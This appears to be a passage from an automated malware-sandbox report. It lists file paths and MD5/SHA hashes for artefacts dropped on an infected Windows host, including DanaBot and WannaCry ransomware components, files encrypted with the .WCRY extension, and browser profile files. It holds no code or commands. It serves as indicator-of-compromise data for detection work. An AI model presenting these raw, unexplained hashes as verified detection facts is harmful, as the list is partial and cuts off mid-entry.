SHA1 cf433431e8d3b7604fc70d13dcec40eda0b526b9
SHA256 5fcd961948b053c5380424247a5b87f60bba59c09783be4a5c41adda8a8b7b0a
SHA512 e37368322a1b814d7616b98a00d29322cf30442d246978d11f94fdf67743f3e920a7ac317d6846579ab4346d84a721a0af08eaaa57e00b8d4f449e24027a5c3c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 9cbac2b18fec34383e62149270ae3a1d
SHA1 40a83c0b4e81a3c7ba592df179c7bb1e9f3bf9e3
SHA256 161e2f3b112330f0a2da282951bd7005011a2985882b82588d2b0cefa3c3d234
SHA512 632317a4ea22a3d4f6b3476c2ac6e81e71edc53c7db07807c59e01d50ee4f361d007d9e5a832e054182a70e1c8bf1aeed7b2bb14818dbf7320d25196e1736060

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ff64115ef1386a878a777003a9584b1b
SHA1 dc707a9e356ebf9ca5c0fa81cbf74edea1f92b0f
SHA256 81ebf9b9a8e2079fb47eacefbb25b67dc313b69aa836fd15dc1cafd5ab133ec7
SHA512 4c513136b2089ca1961457481ceac85752c94a5b9957ae0567411bdd3e49f378cdd91b304ceed915b7676807ecf6776b1803c767dc03a8ab582f2112d096d05b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 be30dc773f2625548a4c86d0b955fb85
SHA1 39fbb50e8a416d826ecc2fe9bf4deae66c49b1cd
SHA256 406d70d8e8f0ed03365baaa30e46c929195a0380caf210d1cabbeb48c6b24eb7
SHA512 8361c710e20f7f09d6d6ec006ac3da8d059a94a3709aabdf60d1b81f42b1e353c9a6a885da116836a4ce5ef6a9926e737381c4a5bdeeb1d0f7442654322a3e10

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bc9c03a9824448c574d2836f30f936f1
SHA1 ba4083c6213b5931ca7b8acfc6cf68500682b936
SHA256 3a81421fbf9b1f74db55f72132a979b959115a17a1a22a4feea2c8d82af77aa1
SHA512 faf1402e5f9ceb08b24c7bad7bae89a43e8cf56d56b51de25176c17d9b53a65add9c89bc01863eb2161c1325e82ed164344c75c56c9351afb23bcb8345c08310

C:\Users\Admin\DOWNLO~1\DanaBot.dll

MD5 7e76f7a5c55a5bc5f5e2d7a9e886782b
SHA1 fc500153dba682e53776bef53123086f00c0e041
SHA256 abd75572f897cdda88cec22922d15b509ee8c840fa5894b0aecbef6de23908a3
SHA512 0318e0040f4dbf954f27fb10a69bce2248e785a31d855615a1eaf303a772ad51d47906a113605d7bfd3c2b2265bf83c61538f78b071f85ee3c4948f5cde3fb24

memory/3408-821-0x0000000000400000-0x0000000000AAD000-memory.dmp

memory/4560-822-0x0000000000400000-0x000000000066B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 69ca8279fc714ac638cd7093d1770d66
SHA1 22a54f91029350c24910088f09f3074f5dca6f14
SHA256 e3fefd84b3531c941427ee580489200816d7cd1c448ed5415b8c93370b8ecd08
SHA512 e1822d7ab9fceb830edbb2a31d3b492ab182fef337016767d8d7db35d0d71f1c3f17dca9544995cb08369235cb744dce61ccff8820db5573694aafcdf901fca3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 644e2e24202900b44d344b563234a0c6
SHA1 dddf2b5be7008bda21fbe4feb34bdeb32c831c27
SHA256 a51c45868d5bfd3d2eb2608c995fdada0b2777158dd88bf257e4042b7e6834bc
SHA512 b9d4d9fb575953a407e03a1f2d36801181db2f5cc96e0b92a76c21018d3a58961f324cba5afadfcdd8c904e764ac4105fad860127fd85787546c2715b87c1a86

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 27e3e63d738aef9e5ff5fc5922580dd4
SHA1 12a3d06549cdc7ce651b3ddbffb150f829da1555
SHA256 cd2454cff228c0ce9d01041dad2a20fa9a2aaa189fce2db2d625a3227fd9035e
SHA512 c039a5f5a1e53280a44cfc314967bdccee69a2e22bec26bb88edaa9de898765bf2feb7070b80afe9ab01e30e22e2c7aa05409158f349844dd5a6d873d9e5a3ad

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 bd02d32c619c73131f9e35439c5a7e68
SHA1 4cc21e2945b8fb3874c15a3403ff42c503deaff5
SHA256 c83df7965ca3d944fd1d592d1887e546eb11cfb8bdb6beeabb778bf7b64c1475
SHA512 8c435bd2f1cb16251ac0f6e0e034f5b8acc0fca6433e8b0f7b8c8d01e4e2cd858339a9d08cb47694de2aa7711964d2188b81dba28ef8bcb766ab7a9391bb2592

memory/4560-878-0x0000000000400000-0x000000000066B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 47b5c8a12f4b320549303fe78841f41f
SHA1 6b42847cb4c18591bc9540245c59e1b79c3a9dff
SHA256 32b17ed382b41f71d304581ace195158e09c2256415fc1833921d75feebeefe0
SHA512 f2c629f8640b1ea258eaff5685e59095eae02199fa50d00bd729b07fb34ecf08aa7f7587cd51ca991340538c4a9d3f576973a376d783fb7a05c42f787d84c4f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7c7254968b350454d638bce16d985879
SHA1 c4a826563ee256d3ba1ee9772d6b0196a21e22b4
SHA256 16ace9388ef589881cee70df55e3d31017d1e40a036e3af19ceb57d99c070dd8
SHA512 3a9f67dff41451e9c50101b98a4e983d48894cca113299023656fd6f7bdc1e8f289305767f3c43b99a0f81c1016aa490efdd7d9557b852ab608d94a3015a9942

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\87e5cc09-072a-4733-8764-feee08e98bf1.tmp

MD5 85f3887a78c665e59d9364ddaae02acc
SHA1 5cb3bbd5c4e9c3f0cde607d2dc79431a4d1797cc
SHA256 4b423fb1a46430b3839de182623439d065877e95de17ebb950a90c5f0ca93518
SHA512 dc4c6ae521227a2429ea80adce60020f608ee9ee9956da6454c003648566b6ada3145c4f80e9e1eb680da846a77a62948dda2c2afc1f9375d3f3223704e34dd2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ed23477a4a8642e63d96e78ae017a2ea
SHA1 fc4b3f72b67686092d0ee4516bd227e7371f0ab8
SHA256 8623985ca152372b47c9826745e173641ecab813cc0d319af2f6adba36c2e067
SHA512 bc9ee2bb4075f0f524e45ade64ea17ff2608d8d09406dfd1684a802529ad75769de81a54c7522b18ff4844a85795433d4dd04cb66451675d37f7f02c09ab3ac3

C:\Users\Admin\Downloads\Unconfirmed 742955.crdownload

MD5 5c7fb0927db37372da25f270708103a2
SHA1 120ed9279d85cbfa56e5b7779ffa7162074f7a29
SHA256 be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844
SHA512 a15f97fad744ccf5f620e5aabb81f48507327b898a9aa4287051464019e0f89224c484e9691812e166471af9beaddcfc3deb2ba878658761f4800663beef7206

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9060ed5ae2c5d7bc2de2a80300573488
SHA1 695439451be4ffa4cd7f3f7eb02fc46e667ff82c
SHA256 ed9b2054e9a3cc5c604463865e36afeb3333c470b1da1d8a8a760a854c61084a
SHA512 7ad00a9dff2acac5b1dff4193780241501a3bae0b7b537ef10629625a5a4144174ab9c3fffb7fdcbc58bfd5bbb1ddc9402dbb190679892a9b46f3b5021c6340e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 df63b37fef7c9a724c3e931dd0a55f98
SHA1 e61a2ad943fb2b26682195ab91dab35da48c6f20
SHA256 8cd1e04115008a43115dfb7505b05847124d1689382f236c53d087f8a05cd1f6
SHA512 cf36e5d7796769003a9efb2ccb0ff4dd718bd55c92e32d5b267b1bdc4225338777d7a4a125e92e685dc045df81c491ca7702ce72fa8e245eb38994ddd8041044

memory/1480-957-0x0000000010000000-0x0000000010012000-memory.dmp

C:\Users\Admin\Downloads\307591731173408.bat

MD5 a261428b490a45438c0d55781a9c6e75
SHA1 e9eefce11cefcbb7e5168bfb8de8a3c3ac45c41e
SHA256 4288d655b7de7537d7ea13fdeb1ba19760bcaf04384cd68619d9e5edb5e31f44
SHA512 304887938520ffcc6966da83596ccc8688b7eace9572982c224f3fb9c59e6fb2dcaa021a19d2aae47346e954c0d0d8145c723b7143dece11ac7261dc41ba3d40

C:\Users\Admin\Downloads\c.vbs

MD5 02b937ceef5da308c5689fcdb3fb12e9
SHA1 fa5490ea513c1b0ee01038c18cb641a51f459507
SHA256 5d57b86aeb52be824875008a6444daf919717408ec45aff4640b5e64610666f1
SHA512 843eeae13ac5fdc216b14e40534543c283ecb2b6c31503aba2d25ddd215df19105892e43cf618848742de9c13687d21e8c834eff3f2b69a26df2509a6f992653

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f8ef9583cf3e8370f2d05b967c5969ed
SHA1 126bfc504f281ce6dd62d138f3efc6d51d98dd8a
SHA256 cf7bd765eb95aea743f5ff5b1ed398597bb1ae0d2562080278826421a66a4b0f
SHA512 f72ecaa17b90fd607ac49922ea88294d8fbd192e2df5f7e188a1a64d2e1562257e3bc294e9b6adef89ce05f5cea5227b9677f574c7e34e382dcf616d3e50b416

C:\Users\Admin\Downloads\!WannaDecryptor!.exe

MD5 cf1416074cd7791ab80a18f9e7e219d9
SHA1 276d2ec82c518d887a8a3608e51c56fa28716ded
SHA256 78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df
SHA512 0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

C:\Users\Admin\Downloads\!WannaDecryptor!.exe.lnk

MD5 10547ff5a5416ad7a8af9523ad92d887
SHA1 85d0b35a03e18b3090ce6f3843593932296015d0
SHA256 9be47695ce026bdef2da5a3b52fff3a3928fa5bb5ca1a89c19dd8f5d56f61d86
SHA512 f3d968d326d756ee6022f0b8d91786a824acbd3b666339f44366d4b35d3f815ac0623af47def5313296434c7919c3d36bff18db121a21d1e4448d7b241f8e4a1

C:\Users\Admin\Downloads\00000000.res

MD5 e08ea491c69966c2471436ebd64d3c3d
SHA1 9b2141e7e5f352f56d54bbd3a8db12952988ef56
SHA256 3646ad74b1c9e8e1e55ba28769a7ff0d60c5fbbe1e6ad3f12ce4bcd734d11499
SHA512 ecc824f02f4aa1edb5f619d59b97a2ba4a63a52069c5fa7161eeb9c1d938447c03c7de3b9624681235e09e762fb0af896ad8d7b41c30626d41307c4783fae222

C:\Users\Admin\Downloads\c.wry

MD5 4c10923f7e121618060900ad1fbba214
SHA1 519a73b48e8a63f8cce282585ca44aec4a8ef1d6
SHA256 0d6f33345e4f97018c937e5eb2324bc76f04711338ea07927eb63e2b7dc83353
SHA512 9a27fe90a6e70726356c993d1e07381c40c21df19182505e1c963550b070c548321d41ac925c89cfa56e67211f9a82ddd8da9010876bc8e0d83a9c7330da4967

C:\Users\Admin\Downloads\!Please Read Me!.txt

MD5 afa18cf4aa2660392111763fb93a8c3d
SHA1 c219a3654a5f41ce535a09f2a188a464c3f5baf5
SHA256 227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0
SHA512 4161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

MD5 02727d7631092ed4281c6d76b85e4216
SHA1 5972f6e01ba62155ae05bf5aca5f336bccbc96d3
SHA256 552b129f547d6eb63f03cc9582afb158c4cb81fccedc81aa6ae3e19dea4e4ea6
SHA512 24ec82ed2a17d7a083ad151f307727880f661de14c0fc941ab0d1d1fe9349ab000787e82d8b94ca463319173f374d6ab737080320766e158b9a476664821f6cf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db

MD5 9e02552124890dc7e040ce55841d75a4
SHA1 f4179e9e3c00378fa4ad61c94527602c70aa0ad9
SHA256 7b6e4ce73ddd8b5e7a7c4a94374ac2815d0048a5296879d7659a92ee0b425c77
SHA512 3e10237b1bff73f3bb031f108b8de18f1b3c3396d63dfee8eb2401ce650392b9417143a9ef5234831d8386fc12e232b583dd45eada3f2828b3a0a818123dd5cd

C:\Users\Admin\Downloads\Unconfirmed 993493.crdownload

MD5 84c82835a5d21bbcf75a61706d8ab549
SHA1 5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA512 90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

C:\Users\Admin\Downloads\00000000.res

MD5 ebb817394e3a84108981aa68c7e9bbc8
SHA1 3876ac4d4ac96b7c5ea5af74d997cf50cc560674
SHA256 e7365a6671d31a121643a09123ceee6be4a6e7d3c3441f85a3991d786ebec191
SHA512 cfbb2000b2fe219e7ce300a4a26ea490022420980abbf431599f8fbf90f6ea847dd7962dcfbc9da3c0dbc7cbf921297c77fbb1f6168af02af69712c985b63da4

C:\Users\Admin\Downloads\m.wry

MD5 980b08bac152aff3f9b0136b616affa5
SHA1 2a9c9601ea038f790cc29379c79407356a3d25a3
SHA256 402046ada270528c9ac38bbfa0152836fe30fb8e12192354e53b8397421430d9
SHA512 100cda1f795781042b012498afd783fd6ff03b0068dbd07b2c2e163cd95e6c6e00755ce16b02b017693c9febc149ed02df9df9b607e2b9cca4b07e5bd420f496

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 c19d818ebbc0e6562fdb0e00968eefa4
SHA1 51fe759e10d944b5ff2fe36f66b1f4dd94bdc28b
SHA256 b8109aa5a8b6f460999b79c480cc198c36cd7e06b79c36b399fca4814cb35340
SHA512 9def795dcfe89d59aa54e2e9e45b777bb4e4ac1770e9d89a4bd3744d35f749b4c39f9adb36fbc47871c2d9b44ddc81a5f517b915f772944fc21dbed462beb66e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 74f367f645af6a2805e3c2b02d8d5ea7
SHA1 537c9a124302f68aa32f08eec95a7ce715c77c98
SHA256 1f8ddfa46bcfec854aeebf838b01eedfc737959e005686102ac20401a63596e1
SHA512 320a09f6c8f06b08e12778a03e5f598e635b02f148fb956302f3f88c4bad0e31aa0812cf53791186bbee705e044085511290955c2cb3fa993eca789132a79298

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 d372331ca293c815e6fb2d2de7b4a896
SHA1 d8fdb5587fd1b473b28f36e374c053c3273ad24c
SHA256 2ec8ed2b69db42a0f91e47357cffc737d6108ed549bda1c54b277699d83f11c5
SHA512 150df9fccc225a63ad6c9cf1b12f10f623d0fc40f978ec60df2c1024873d393451737ebd6d32922fb4d7ef52acbc56c4e4359314c8bfb0aca460eb5f0ba6311f

C:\Users\Admin\Downloads\00000000.res

MD5 44bca8bb7a934c6b23c569dbddf9f9c8
SHA1 f4ecaf2f4d36f0355201dc5242c3c57d4dbf1fd7
SHA256 75f7c97757730501e5aef47a4630628aa22532e97646a13efc7d5012247a7b68
SHA512 b90eae13d14133a4694471e2aedb573616fb9f670e8cdad88929754dc38ad6c051b6989d1cd8eb07cb41092c8e5bde68ffee5bebdcd91392f6f8780a7cf6e1c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bee19942fafe1e6cc7152af20808c232
SHA1 ba3b76f20e3ba36bc2b39489767b86c4b76ee666
SHA256 76fa6cf2f6ad8e19a54fda7b1efd0a86dacbeb9ae37c5092a51a5a8d753c65f1
SHA512 0226e133be143d52879f6838c11bc4967bc4d1d58b1baa307a85c77a8c1fba7c2f6fa301d8c9a7aeea0b48231e0bca0f660537f0bcfc6465aacda4cec5e968b5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 9d923d2049f2e205bd476f9625957fa8
SHA1 3c6971b5c41c0e014a23bfeaef24210fe2bb8402
SHA256 3cbcf4bc56710a414589d752625f27c392508f9bcb26e1bd0b6a162d04b3536c
SHA512 89d1cab32a9a1729b9c24322d00573b73d6c7fff83d7c533bf7b6d94aa3b799b4985f95ca820a1e5ede64b997c779cee3728be6887080911fc01b3bce9c22de0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 f76fc1233451d88b68db1cde94d03526
SHA1 a391b69b8d233f39c22fe8b9c1609fa04f707870
SHA256 b789e514c741e3ab7ae006930cb1e3f8613aeefd6db64107fc5b151cb1a2e0c3
SHA512 e1da600a1025a7e4677e11322a42181909f1373e52d9536cfdec4221150b20833574d40ef19056297d0e40e5637662939af20a0ef90608aaa1a47f836fcca759

C:\Users\Admin\Downloads\msg\m_finnish.wnry

MD5 35c2f97eea8819b1caebd23fee732d8f
SHA1 e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA256 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

C:\Users\Admin\Downloads\00000000.res

MD5 a2cb9c0b86aaeb564cab5ed7ad5c799d
SHA1 17bc66a9dfb12b8e15af5524e0e81bc3166b87ae
SHA256 69c98d9dbd683e0b694546353c5a85854753d698dbf7b122954f0f1b344a8b73
SHA512 cdc1fa53603fb214daff6907210e90ed8c0d0f0113faf29766dbb85fb1a5164cf5353ca5f7b978c219cc41a1e3ca7e2eed358e00022f765803694a855fb88a32

C:\Users\Admin\Downloads\00000000.pky

MD5 9daf6c3a754bdb0f25835689d830a8d2
SHA1 322283234ee9e70aa12b7496d0e5efe5b1208faf
SHA256 dbe17333d39d4ff6b3d6c10e2b676cb0aaa726586e77704994172ab18ba1e22d
SHA512 c7d4f61c13454f384d7655a6ae1253618443aaa610f4ea51d02ce3ece6c2164b71179fe9b570b4468f36bf50153ec28c74d64f437cf402c53033cddb4cff8a92

memory/968-2373-0x0000000010000000-0x0000000010010000-memory.dmp

C:\Users\Admin\Downloads\ApproveRestart.zip.WCRY

MD5 dd5eefc5a4066785d2000913b03f9386
SHA1 a538c5a387f8c3d429238561f0a9fb666980408f
SHA256 742b0183c1313993fcc0490098adf918c391824513f0c7b90a3128c45a747dff
SHA512 c36407a6785d9d3d11cb059d62a58b6944bc4a88406af7719f5c7de7e59ebc04272d9ebb180fa0cc678e8dda733e8476cc1df8df79ab480ac0a3b042c9ba9771

C:\Users\Admin\Downloads\EnableSend.wmv.WCRY

MD5 f3673df9a9b20cab7c65509f6d8455af
SHA1 3d8c56c42d7c629073849f75511ed2290d42581b
SHA256 38019fe12922eac8f6cc66bb24b27ff160616e65ba49516b8881f17352e2c284
SHA512 bef05371d5c7e6f1eca79e94031aac5c55f5818a1bb618ddbf55a712ce9e3ff26ef68743799d47297bbf4ac3cacbf2684a975fcacb8412435133b84c34aa3d8a

C:\Users\Admin\Downloads\LimitCompare.tif.WCRY

MD5 eba51075a38b158360b49756bbd218d1
SHA1 4df2c16350932e8e385097791742d982b6d0d2a3
SHA256 5d1a100d7b631cb51e40a7dd57dc943829d4c1124862bc7cb906e4403287b908
SHA512 dd7c0ef331d66413ce6d410dcb4e9de12f10d5e31ae04efda8000de6e2406b59de273cfe622eaa0ee8528f877b922efab76d555ef7c8f4a4b9fbe3f5b5eaeb7e

C:\Users\Admin\Downloads\HideConvert.docx.WCRY

MD5 d89705814217f37c2d4b1db6cbc2dbfb
SHA1 ca5486e8240cabf814968fcbcd732ad64059fe9b
SHA256 69f6fadd35c58311b1c15f69593e1f4995b2d42b2690be20bc3dafaaad9e36b5
SHA512 a15f67313fc3477ab3ddf417212af63c6f28d62c0ed9314234d3d01156d6e871128727d07c077818b6d0e481c7c80f4167c2149c5c6e05748cd45e881aba1d81

C:\Users\Admin\Downloads\GrantProtect.vsd.WCRY

MD5 7fcfe0b11c379a00b4f939642b1534c0
SHA1 b22852402a582b813a63748a1a94f22d120a9db5
SHA256 62a3ca35adf3ac64e5d3971236ef76a17a60a460b3e69fa03d887b181d8346e2
SHA512 ccf3b12fb748eb235434732cfc5265a59d173e1f4ebf53f1ed845e404cf98d7774e6cbbf038c795d580da6b9b9fbc6a02df879b9c991a61dd1693d378851d522

C:\Users\Admin\Downloads\FormatConvert.xlt.WCRY

MD5 1d8a8818a6dbad8cbfc9448ba85b1ba4
SHA1 24f2350480bbea5380d7a8ffa97f89ef087ada56
SHA256 2f824028265ca4e921ac9908427ec1ac7ff1322153da6705e26af6530ba1c16b
SHA512 c2022c1e5efc61915bda7f756998423e2a13d72bcbd0358e15db956fea25c6eeb35a0d1d96e286240a5e8741b2fcdde4d09e49d1fe1f679e64c4e2be154dedcd

C:\Users\Admin\Downloads\f.wry

MD5 4490f998dfb5ae142449871129380048
SHA1 5d457484a4d6098c9975c14af31033481f9b1d99
SHA256 75962be65c92a3f45142193118f349a72453ae8e6b27508346f96a30cf969a9e
SHA512 06d29fcf67ba1a97ad8d0e78093a55ba834615c0b09528fececf0f4c7e54d750d5fdba79137afd0ca2e61178b904342400b72da537c2731aaff6aadb4e3cf581

C:\Users\Admin\Downloads\c.wnry

MD5 8124a611153cd3aceb85a7ac58eaa25d
SHA1 c1d5cd8774261d810dca9b6a8e478d01cd4995d6
SHA256 0ceb451c1dbefaa8231eeb462e8ce639863eb5b8ae4fa63a353eb6e86173119e
SHA512 b9c8dfb5d58c95628528cc729d2394367c5e205328645ca6ef78a3552d9ad9f824ae20611a43a6e01daaffeffdc9094f80d772620c731e4192eb0835b8ed0f17

C:\Users\Admin\Downloads\b.wnry

MD5 c17170262312f3be7027bc2ca825bf0c
SHA1 f19eceda82973239a1fdc5826bce7691e5dcb4fb
SHA256 d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
SHA512 c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

C:\Users\Admin\Downloads\00000000.eky

MD5 af2acbfbc0ff1c3fdd452e1f197e7b3c
SHA1 8be795c281c4ea15ef41ee61a69ad08af8753620
SHA256 bca05270ea536da946ee508107d40253f1af7c3192bcfea0ffec5a26005c8ca7
SHA512 1780fc20135e8e419fb86977b27b1d3f49abc81203516d26f37ccd77a57b70b877985fc5387f51682195bc257c58a53fd3cb1fc441e61e5585979bf3e2cf3555

C:\Users\Admin\Downloads\@[email protected]

MD5 7a2726bb6e6a79fb1d092b7f2b688af0
SHA1 b3effadce8b76aee8cd6ce2eccbb8701797468a2
SHA256 840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5
SHA512 4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 d757a274fb3398bb3a0fa8f75451df55
SHA1 de5b90d59dc5ab62bd54df2df01387570d686b68
SHA256 3a59e7e12f467b6be5123f7e3cf7e1bdb21880681172753c62f90cc14253865c
SHA512 8522f70f7cece69544c021a4cf8fd02b30c858a6e77cc31d859a96b7709dc3cbb5b7183553a0d5216eb30648057b19d14ae25c762d568ddbd7d9dddbdb34e876

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c22d728840b72dca0509a2ec80223f77
SHA1 ca5e8ce4bdddcda7235f0e5dc7a00df13d500042
SHA256 046bdad5e6f1ff57b854a3a4d60d4d5ef870b9170257c5c2477361dda3af9bbc
SHA512 5a677b37dc2733df984509d6c6c976b4a0effe6d15fb702dadb9c878b8d4a52fefdac6ecaec668091b7be859dc8e36616e3c24561944914f844d364f9b0e68a3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f7f25172a700afecceeb56d8c20ef997
SHA1 8fea4c65364f4712a711d357c3d8b9523e2c50f2
SHA256 94758952588c16a99d4a08481688d6792ef832d7b1be46d28b0a686fae10d7be
SHA512 2dc070053e666ac210cbf131d2e2b5d811bd1c653221c33a43dff197e6fe2cc199fbdf7129d2655420f2e3c2d3bdf4912739caffc320b424f1623b7f58dcc4fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

MD5 48327e31f9f415f6af4cea2ad6a6e67f
SHA1 a60dd3b998645528259836c361921f90b36b656d
SHA256 7e6811c41a638086063563bebf30e5fffaa5b092e8ef930f50a1a8f63857f34f
SHA512 0ca5e047d57aeb3509c0875b8c34bdf408f159e7b847f8bb51d4620d5dac04eb5ab9cf9e369defb63cfdefa0447cabc8089a13a8685f8d517e8a154b4ef50bb9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\prefs.js

MD5 1b94fbd853dd9218505066638c459815
SHA1 3d5ac25f4ece909eebc3a0996d4c332e10c62873
SHA256 beb251f6d6213200280845f4e699f81e14c693f1f9dbce19f9afc3ede066cfb0
SHA512 b715a0f0d846631a8387f2f34fd237e9210125584547123cac178b30a792586e38fde664535f9ce1f6b1a1b6c9a8feb0e0ef8eb7ab7965b01cb716772ac4da5a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\datareporting\glean\pending_pings\b86e248d-9d45-4ca5-8d8a-68d339c50b37

MD5 9184be0615b99ba01850d220b6df80fe
SHA1 12ccf0d920ccc8b081d4c912a9624eb029d60d93
SHA256 01730108c113a95dd042a47252c9404a5b0e05fb78a256ef1dd54df9a52a53cd
SHA512 71015682eb205e00819a1262db4ed3e7d5f2b63dbb043ef441dae5759715834469e2288c7773d4fd9f0cbe4d4343f1c2bae3794aacd696dd9fea0ffad8f853b9

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\datareporting\glean\pending_pings\f2ba9690-f99b-4f0e-ac6c-5001d2997ed2

MD5 e2c6b42df759016099f402f5c1f0d23f
SHA1 0c5dd5c0303e68493775b8ce0c00c4863528aaaa
SHA256 8c0c2840feadc93b890094025e2508b3b0657243017dce5d62dc60d824b275c6
SHA512 3f57dcbfd1fc5efa1e7793d8b6566767c0baa80126315ed23624912d14ee6b056949d3adc52082ae251d1a034ea3e4f7e3f8183d921ea2bc85173888922bed09

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\datareporting\glean\pending_pings\6951cf84-bf7f-4af0-82f4-7792c2e2c6d7

MD5 1986f771c3f418f5312231da357fbc87
SHA1 8382ec1b6d3c3be3aecc1d18230b4421b80d0abc
SHA256 c6eddfc7de70c7ff6bb512e56fb8de52dbe2a21ed0fac76d0b1752323777c976
SHA512 4afc3e261d9f37716f0dfbb9dae5756df0c51eeef1b22a775137f92fc0a3b9144932e189736557cb35f05e8c89c6aa24e4ca76e28d04d8543fc56f207cfdde06

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\datareporting\glean\db\data.safe.tmp

MD5 9e9b571ceb943df839f70d23b03cc48d
SHA1 d870e1099491f9f153f83c093762e8d9f11408d0
SHA256 6d14226fe71998ee6f4f6a1e07696e6ec4918e53a863f3dbc7073aa0a8d3982d
SHA512 a46b4d05683f2ceff5adb04d02c31b90280d9ab59b5aa087080439ad206802b2308c83d1a744c404c7715da0dc918a1021d4ae64f4a308675b358ef9b9dfed4b

C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\update-config.json

MD5 7d1d7e1db5d8d862de24415d9ec9aca4
SHA1 f4cdc5511c299005e775dc602e611b9c67a97c78
SHA256 ffad3b0fb11fc38ea243bf3f73e27a6034860709b39bf251ef3eca53d4c3afda
SHA512 1688c6725a3607c7b80dfcd6a8bea787f31c21e3368b31cb84635b727675f426b969899a378bd960bd3f27866023163b5460e7c681ae1fcb62f7829b03456477

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\sd844ipy.default-release\activity-stream.discovery_stream.json

MD5 f9f54c1c45efd0c1f4120ffb1ace89ac
SHA1 867fc0137c65eba4748c65c34b0e0e6d44326170
SHA256 13f8c7623634a519a0c7fa9e5c47760cc12b1a1c0a64c17613d53b53795af905
